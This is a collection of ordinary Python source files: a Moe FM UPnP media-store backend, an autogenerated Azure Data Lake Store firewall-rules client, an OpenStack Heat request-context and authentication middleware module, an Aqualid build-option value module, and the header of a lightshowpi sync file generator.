storage_id = item.get_id()
if storage_id is None:
storage_id = self.getnextID()
storage_id = str(storage_id)
return super(MoeFmPlaylistStore, self).append_item(item, storage_id)
def get_by_id(self, id):
self.info("get_by_id: %r", id)
if isinstance(id, basestring):
id = id.split("@", 1)
id = id[0].split(".")[0]
return self.store.get(str(id))
def upnp_init(self):
self.current_connection_id = None
self.server.connection_manager_server.set_variable(
0,
"SourceProtocolInfo",
["http-get:*:audio/mpeg:*"],
default=True,
)
root_item = Container(None, "Moe FM")
self.root_item = root_item
self.set_root_item(root_item)
root_item.add_child(MoeFmRandomPlaylist(self, root_item))
fav_tracks = MoeFmMultiPageTrackContainer(
self, root_item, "Favorite tracks", api_params={"fav": "song"}
)
fav_tracks.storage_id = "fav-tracks"
root_item.add_child(fav_tracks)
def on_update_completed(self, container):
self.update_id += 1
try:
self.server.content_directory_server.set_variable(
0, "SystemUpdateID", self.update_id,
)
value = (container.get_id(), container.get_update_id())
self.info("on_update_completed %s %s", self.update_id, value)
self.server.content_directory_server.set_variable(
0, "ContainerUpdateIDs", value,
)
except Exception as e:
self.warning("%r", e)
if __name__ == '__main__':
from twisted.internet import reactor
def main():
from coherence.base import Coherence, Plugins
Plugins().set("MoeFmPlaylistStore", MoeFmPlaylistStore)
conf = dict(settings.get("coherence_config", {}))
conf.update({
"plugin": [{"backend": "MoeFmPlaylistStore"}]
})
Coherence(conf)
reactor.callWhenRunning(main)
reactor.run()
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class FirewallRulesOperations(object):
"""FirewallRulesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.datalake.store.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_account(
self,
resource_group_name, # type: str
account_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.FirewallRuleListResult"]
"""Lists the Data Lake Store firewall rules within the specified Data Lake Store account.
:param resource_group_name: The name of the Azure resource group.
:type resource_group_name: str
:param account_name: The name of the Data Lake Store account.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either FirewallRuleListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.datalake.store.models.FirewallRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_account.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('FirewallRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_account.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules'} # type: ignore
def create_or_update(
self,
resource_group_name, # type: str
account_name, # type: str
firewall_rule_name, # type: str
parameters, # type: "_models.CreateOrUpdateFirewallRuleParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.FirewallRule"
"""Creates or updates the specified firewall rule. During update, the firewall rule with the
specified name will be replaced with this new firewall rule.
:param resource_group_name: The name of the Azure resource group.
:type resource_group_name: str
:param account_name: The name of the Data Lake Store account.
:type account_name: str
:param firewall_rule_name: The name of the firewall rule to create or update.
:type firewall_rule_name: str
:param parameters: Parameters supplied to create or update the firewall rule.
:type parameters: ~azure.mgmt.datalake.store.models.CreateOrUpdateFirewallRuleParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FirewallRule, or the result of cls(response)
:rtype: ~azure.mgmt.datalake.store.models.FirewallRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-11-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'firewallRuleName': self._serialize.url("firewall_rule_name", firewall_rule_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CreateOrUpdateFirewallRuleParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FirewallRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules/{firewallRuleName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
account_name, # type: str
firewall_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.FirewallRule"
"""Gets the specified Data Lake Store firewall rule.
:param resource_group_name: The name of the Azure resource group.
:type resource_group_name: str
:param account_name: The name of the Data Lake Store account.
:type account_name: str
:param firewall_rule_name: The name of the firewall rule to retrieve.
:type firewall_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FirewallRule, or the result of cls(response)
:rtype: ~azure.mgmt.datalake.store.models.FirewallRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'firewallRuleName': self._serialize.url("firewall_rule_name", firewall_rule_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FirewallRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules/{firewallRuleName}'} # type: ignore
def update(
self,
resource_group_name, # type: str
account_name, # type: str
firewall_rule_name, # type: str
parameters=None, # type: Optional["_models.UpdateFirewallRuleParameters"]
**kwargs # type: Any
):
# type: (...) -> "_models.FirewallRule"
"""Updates the specified firewall rule.
:param resource_group_name: The name of the Azure resource group.
:type resource_group_name: str
:param account_name: The name of the Data Lake Store account.
:type account_name: str
:param firewall_rule_name: The name of the firewall rule to update.
:type firewall_rule_name: str
:param parameters: Parameters supplied to update the firewall rule.
:type parameters: ~azure.mgmt.datalake.store.models.UpdateFirewallRuleParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FirewallRule, or the result of cls(response)
:rtype: ~azure.mgmt.datalake.store.models.FirewallRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-11-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'firewallRuleName': self._serialize.url("firewall_rule_name", firewall_rule_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if parameters is not None:
body_content = self._serialize.body(parameters, 'UpdateFirewallRuleParameters')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FirewallRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules/{firewallRuleName}'} # type: ignore
def delete(
self,
resource_group_name, # type: str
account_name, # type: str
firewall_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes the specified firewall rule from the specified Data Lake Store account.
:param resource_group_name: The name of the Azure resource group.
:type resource_group_name: str
:param account_name: The name of the Data Lake Store account.
:type account_name: str
:param firewall_rule_name: The name of the firewall rule to delete.
:type firewall_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-11-01"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'firewallRuleName': self._serialize.url("firewall_rule_name", firewall_rule_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules/{firewallRuleName}'} # type: ignore
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import access
from keystoneclient import auth
from keystoneclient.auth.identity import access as access_plugin
from keystoneclient.auth.identity import v3
from keystoneclient.auth import token_endpoint
from oslo_config import cfg
from oslo_context import context
from oslo_log import log as logging
import oslo_messaging
from oslo_middleware import request_id as oslo_request_id
from oslo_utils import importutils
import six
from heat.common import endpoint_utils
from heat.common import exception
from heat.common.i18n import _LE, _LW
from heat.common import policy
from heat.common import wsgi
from heat.db import api as db_api
from heat.engine import clients
LOG = logging.getLogger(__name__)
TRUSTEE_CONF_GROUP = 'trustee'
auth.register_conf_options(cfg.CONF, TRUSTEE_CONF_GROUP)
class RequestContext(context.RequestContext):
"""Stores information about the security context.
Under the security context the user accesses the system, as well as
additional request information.
"""
def __init__(self, auth_token=None, username=None, password=None,
aws_creds=None, tenant=None, user_id=None,
tenant_id=None, auth_url=None, roles=None, is_admin=None,
read_only=False, show_deleted=False,
overwrite=True, trust_id=None, trustor_user_id=None,
request_id=None, auth_token_info=None, region_name=None,
auth_plugin=None, trusts_auth_plugin=None, **kwargs):
"""Initialisation of the request context.
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
"""
super(RequestContext, self).__init__(auth_token=auth_token,
user=username, tenant=tenant,
is_admin=is_admin,
read_only=read_only,
show_deleted=show_deleted,
request_id=request_id)
self.username = username
self.user_id = user_id
self.password = password
self.region_name = region_name
self.aws_creds = aws_creds
self.tenant_id = tenant_id
self.auth_token_info = auth_token_info
self.auth_url = auth_url
self.roles = roles or []
self._session = None
self._clients = None
self.trust_id = trust_id
self.trustor_user_id = trustor_user_id
self.policy = policy.Enforcer()
self._auth_plugin = auth_plugin
self._trusts_auth_plugin = trusts_auth_plugin
if is_admin is None:
self.is_admin = self.policy.check_is_admin(self)
else:
self.is_admin = is_admin
@property
def session(self):
if self._session is None:
self._session = db_api.get_session()
return self._session
@property
def clients(self):
if self._clients is None:
self._clients = clients.Clients(self)
return self._clients
def to_dict(self):
user_idt = '{user} {tenant}'.format(user=self.user_id or '-',
tenant=self.tenant_id or '-')
return {'auth_token': self.auth_token,
'username': self.username,
'user_id': self.user_id,
'password': self.password,
'aws_creds': self.aws_creds,
'tenant': self.tenant,
'tenant_id': self.tenant_id,
'trust_id': self.trust_id,
'trustor_user_id': self.trustor_user_id,
'auth_token_info': self.auth_token_info,
'auth_url': self.auth_url,
'roles': self.roles,
'is_admin': self.is_admin,
'user': self.user,
'request_id': self.request_id,
'show_deleted': self.show_deleted,
'region_name': self.region_name,
'user_identity': user_idt}
@classmethod
def from_dict(cls, values):
return cls(**values)
@property
def keystone_v3_endpoint(self):
if self.auth_url:
return self.auth_url.replace('v2.0', 'v3')
else:
auth_uri = endpoint_utils.get_auth_uri()
if auth_uri:
return auth_uri
else:
LOG.error('Keystone API endpoint not provided. Set '
'auth_uri in section [clients_keystone] '
'of the configuration file.')
raise exception.AuthorizationFailure()
@property
def trusts_auth_plugin(self):
if self._trusts_auth_plugin:
return self._trusts_auth_plugin
self._trusts_auth_plugin = auth.load_from_conf_options(
cfg.CONF, TRUSTEE_CONF_GROUP, trust_id=self.trust_id)
if self._trusts_auth_plugin:
return self._trusts_auth_plugin
LOG.warn(_LW('Using the keystone_authtoken user as the heat '
'trustee user directly is deprecated. Please add the '
'trustee credentials you need to the %s section of '
'your heat.conf file.') % TRUSTEE_CONF_GROUP)
cfg.CONF.import_group('keystone_authtoken',
'keystonemiddleware.auth_token')
self._trusts_auth_plugin = v3.Password(
username=cfg.CONF.keystone_authtoken.admin_user,
password=cfg.CONF.keystone_authtoken.admin_password,
user_domain_id='default',
auth_url=self.keystone_v3_endpoint,
trust_id=self.trust_id)
return self._trusts_auth_plugin
def _create_auth_plugin(self):
if self.auth_token_info:
auth_ref = access.AccessInfo.factory(body=self.auth_token_info,
auth_token=self.auth_token)
return access_plugin.AccessInfoPlugin(
auth_url=self.keystone_v3_endpoint,
auth_ref=auth_ref)
if self.auth_token:
# FIXME(jamielennox): This is broken but consistent. If you
# only have a token but don't load a service catalog then
# url_for wont work. Stub with the keystone endpoint so at
# least it might be right.
return token_endpoint.Token(endpoint=self.keystone_v3_endpoint,
token=self.auth_token)
if self.password:
return v3.Password(username=self.username,
password=self.password,
project_id=self.tenant_id,
user_domain_id='default',
auth_url=self.keystone_v3_endpoint)
LOG.error(_LE("Keystone v3 API connection failed, no password "
"trust or auth_token!"))
raise exception.AuthorizationFailure()
@property
def auth_plugin(self):
if not self._auth_plugin:
if self.trust_id:
self._auth_plugin = self.trusts_auth_plugin
else:
self._auth_plugin = self._create_auth_plugin()
return self._auth_plugin
def get_admin_context(show_deleted=False):
return RequestContext(is_admin=True, show_deleted=show_deleted)
class ContextMiddleware(wsgi.Middleware):
def __init__(self, app, conf, **local_conf):
# Determine the context class to use
self.ctxcls = RequestContext
if 'context_class' in local_conf:
self.ctxcls = importutils.import_class(local_conf['context_class'])
super(ContextMiddleware, self).__init__(app)
def make_context(self, *args, **kwargs):
"""Create a context with the given arguments."""
return self.ctxcls(*args, **kwargs)
def process_request(self, req):
"""Constructs an appropriate context from extracted auth information.
Extract any authentication information in the request and construct an
appropriate context from it.
"""
headers = req.headers
environ = req.environ
try:
username = None
password = None
aws_creds = None
if headers.get('X-Auth-User') is not None:
username = headers.get('X-Auth-User')
password = headers.get('X-Auth-Key')
elif headers.get('X-Auth-EC2-Creds') is not None:
aws_creds = headers.get('X-Auth-EC2-Creds')
user_id = headers.get('X-User-Id')
token = headers.get('X-Auth-Token')
tenant = headers.get('X-Project-Name')
tenant_id = headers.get('X-Project-Id')
region_name = headers.get('X-Region-Name')
auth_url = headers.get('X-Auth-Url')
roles = headers.get('X-Roles')
if roles is not None:
roles = roles.split(',')
token_info = environ.get('keystone.token_info')
auth_plugin = environ.get('keystone.token_auth')
req_id = environ.get(oslo_request_id.ENV_REQUEST_ID)
except Exception:
raise exception.NotAuthenticated()
req.context = self.make_context(auth_token=token,
tenant=tenant, tenant_id=tenant_id,
aws_creds=aws_creds,
username=username,
user_id=user_id,
password=password,
auth_url=auth_url,
roles=roles,
request_id=req_id,
auth_token_info=token_info,
region_name=region_name,
auth_plugin=auth_plugin)
def ContextMiddleware_filter_factory(global_conf, **local_conf):
"""Factory method for paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
def filter(app):
return ContextMiddleware(app, conf)
return filter
def request_context(func):
@six.wraps(func)
def wrapped(self, ctx, *args, **kwargs):
try:
return func(self, ctx, *args, **kwargs)
except exception.HeatException:
raise oslo_messaging.rpc.dispatcher.ExpectedException()
return wrapped
| |
#
# Copyright (c) 2014-2015 The developers of Aqualid project
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom
# the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import operator
from aql.util_types import to_sequence, UniqueList, Dict
__all__ = (
'Condition', 'Operation', 'InplaceOperation', 'ConditionalValue',
'OptionValue', 'SimpleOperation', 'SimpleInplaceOperation',
'op_set', 'op_iadd', 'op_isub', 'op_iupdate',
'ErrorOptionValueMergeNonOptionValue'
)
# ==============================================================================
class ErrorOptionValueMergeNonOptionValue(TypeError):
def __init__(self, value):
msg = "Unable to merge option value with non option value: '%s'" % (
type(value),)
super(ErrorOptionValueMergeNonOptionValue, self).__init__(msg)
# ==============================================================================
class ErrorOptionValueOperationFailed(TypeError):
def __init__(self, op, args, kw, err):
args_str = ""
if args:
args_str += ', '.join(map(str, args))
if kw:
if args_str:
args_str += ","
args_str += str(kw)
msg = "Operation %s( %s ) failed with error: %s" % (op, args_str, err)
super(ErrorOptionValueOperationFailed, self).__init__(msg)
# ==============================================================================
def _set_operator(dest_value, value):
return value
def _op_iadd_key_operator(dest_value, key, value):
dest_value[key] += value
return dest_value
def _op_isub_key_operator(dest_value, key, value):
dest_value[key] -= value
return dest_value
# ==============================================================================
def _update_operator(dest_value, value):
if isinstance(dest_value, (UniqueList, list)):
dest_value += value
return dest_value
elif isinstance(dest_value, Dict):
dest_value.update(value)
return dest_value
else:
return value
# ==============================================================================
def op_set(value):
return SimpleInplaceOperation(_set_operator, value)
def op_set_key(key, value):
return SimpleInplaceOperation(operator.setitem, key, value)
def op_get_key(value, key):
return SimpleOperation(operator.getitem, value, key)
def op_iadd(value):
return SimpleInplaceOperation(operator.iadd, value)
def op_iadd_key(key, value):
return SimpleInplaceOperation(_op_iadd_key_operator, key, value)
def op_isub_key(key, value):
return SimpleInplaceOperation(_op_isub_key_operator, key, value)
def op_isub(value):
return SimpleInplaceOperation(operator.isub, value)
def op_iupdate(value):
return SimpleInplaceOperation(_update_operator, value)
# ==============================================================================
def _convert_args(args, kw, options, converter):
tmp_args = []
for arg in args:
if isinstance(arg, Operation):
arg.convert(options, converter)
else:
arg = converter(options, arg)
tmp_args.append(arg)
tmp_kw = {}
for key, arg in kw.items():
if isinstance(arg, Operation):
arg.convert(options, converter)
elif converter is not None:
arg = converter(options, arg)
tmp_kw[key] = arg
return tmp_args, tmp_kw
# ==============================================================================
def _unconvert_args(args, kw, options, context, unconverter):
tmp_args = []
for arg in args:
if isinstance(arg, Operation):
arg = arg(options, context, unconverter)
elif unconverter is not None:
arg = unconverter(options, context, arg)
tmp_args.append(arg)
tmp_kw = {}
for key, arg in kw.items():
if isinstance(arg, Operation):
arg = arg(options, context, unconverter)
elif unconverter is not None:
arg = unconverter(options, context, arg)
tmp_kw[key] = arg
return tmp_args, tmp_kw
# ==============================================================================
class Condition(object):
__slots__ = (
'condition',
'predicate',
'args',
'kw',
)
def __init__(self, condition, predicate, *args, **kw):
self.condition = condition
self.predicate = predicate
self.args = args
self.kw = kw
# -----------------------------------------------------------
def convert(self, options, converter):
self.args, self.kw = _convert_args(
self.args, self.kw, options, converter)
cond = self.condition
if cond is not None:
cond.convert(options, converter)
# -----------------------------------------------------------
def __call__(self, options, context, unconverter):
if self.condition is not None:
if not self.condition(options, context, unconverter):
return False
args, kw = _unconvert_args(
self.args, self.kw, options, context, unconverter)
return self.predicate(options, context, *args, **kw)
# ==============================================================================
class Operation(object):
__slots__ = (
'action',
'kw',
'args',
)
def __init__(self, action, *args, **kw):
self.action = action
self.args = args
self.kw = kw
# -----------------------------------------------------------
def convert(self, options, converter):
self.args, self.kw = _convert_args(
self.args, self.kw, options, converter)
# -----------------------------------------------------------
def _call_action(self, options, context, args, kw):
return self.action(options, context, *args, **kw)
# -----------------------------------------------------------
def __call__(self, options, context, unconverter):
args, kw = _unconvert_args(
self.args, self.kw, options, context, unconverter)
try:
result = self._call_action(options, context, args, kw)
except Exception as ex:
raise ErrorOptionValueOperationFailed(self.action, args, kw, ex)
return result
# -----------------------------------------------------------
def __add__(self, other):
return SimpleOperation(operator.add, self, other)
# -----------------------------------------------------------
def __radd__(self, other):
return SimpleOperation(operator.add, other, self)
# -----------------------------------------------------------
def __sub__(self, other):
return SimpleOperation(operator.sub, self, other)
# -----------------------------------------------------------
def __rsub__(self, other):
return SimpleOperation(operator.sub, other, self)
# ==============================================================================
class SimpleOperation(Operation):
def _call_action(self, options, context, args, kw):
return self.action(*args, **kw)
# ==============================================================================
class InplaceOperation(object):
__slots__ = (
'action',
'kw',
'args',
)
def __init__(self, action, *args, **kw):
self.action = action
self.args = args
self.kw = kw
def convert(self, options, converter):
self.args, self.kw = _convert_args(
self.args, self.kw, options, converter)
def _call_action(self, options, context, dest_value, args, kw):
return self.action(options, context, dest_value, *args, **kw)
def __call__(self, options, context, dest_value, value_type, unconverter):
if self.action is None:
return dest_value
args, kw = _unconvert_args(
self.args, self.kw, options, context, unconverter)
try:
result = self._call_action(options, context, dest_value, args, kw)
except Exception as ex:
raise ErrorOptionValueOperationFailed(self.action, args, kw, ex)
if result is None:
result = dest_value
dest_value = value_type(result)
return dest_value
# ==============================================================================
class SimpleInplaceOperation(InplaceOperation):
def _call_action(self, options, context, dest_value, args, kw):
return self.action(dest_value, *args, **kw)
# ==============================================================================
class ConditionalValue (object):
__slots__ = (
'ioperation',
'condition',
)
def __init__(self, ioperation, condition=None):
self.ioperation = ioperation
self.condition = condition
# -----------------------------------------------------------
def convert(self, options, converter):
condition = self.condition
if isinstance(condition, Condition):
condition.convert(options, converter)
ioperation = self.ioperation
if isinstance(ioperation, InplaceOperation):
ioperation.convert(options, converter)
# -----------------------------------------------------------
def evaluate(self, value, value_type, options, context, unconverter):
condition = self.condition
if (condition is None) or condition(options, context, unconverter):
if self.ioperation is not None:
value = self.ioperation(
options, context, value, value_type, unconverter)
return value
# ==============================================================================
class OptionValue (object):
__slots__ = (
'option_type',
'conditional_values',
)
def __init__(self, option_type, conditional_values=None):
self.option_type = option_type
self.conditional_values = list(to_sequence(conditional_values))
# -----------------------------------------------------------
def is_set(self):
return bool(self.conditional_values)
# -----------------------------------------------------------
def is_tool_key(self):
return self.option_type.is_tool_key
# -----------------------------------------------------------
def append_value(self, conditional_value):
self.conditional_values.append(conditional_value)
# -----------------------------------------------------------
def prepend_value(self, conditional_value):
self.conditional_values[:0] = [conditional_value]
# -----------------------------------------------------------
def merge(self, other):
if self is other:
return
if not isinstance(other, OptionValue):
raise ErrorOptionValueMergeNonOptionValue(other)
values = self.conditional_values
other_values = other.conditional_values
diff_index = 0
for value1, value2 in zip(values, other_values):
if value1 is not value2:
break
diff_index += 1
if self.option_type.is_auto and not other.option_type.is_auto:
self.option_type = other.option_type
self.conditional_values += other_values[diff_index:]
# -----------------------------------------------------------
def reset(self):
self.conditional_values = []
# -----------------------------------------------------------
def copy(self):
return OptionValue(self.option_type, self.conditional_values)
# -----------------------------------------------------------
def __copy__(self):
return self.copy()
# -----------------------------------------------------------
def get(self, options, context, evaluator=None):
if context is None:
context = {}
else:
try:
return context[self]
except KeyError:
pass
value_type = self.option_type
value = value_type()
context[self] = value
for conditional_value in self.conditional_values:
value = conditional_value.evaluate(
value, value_type, options, context, evaluator)
context[self] = value
return value
| |
# sync file generator for lightshowpi
# run usage
#
# python sync_file_generator.py
#
# Enter y to confirm that you wish to run this
# Enter the path to the folder containing your audio files
# along with the sync files it will also generate a playlist file
# enter the path to this playlist file in your overrides.cfg and
# lightshowpi will use this as your new playlist
import decoder
import glob
import mutagen
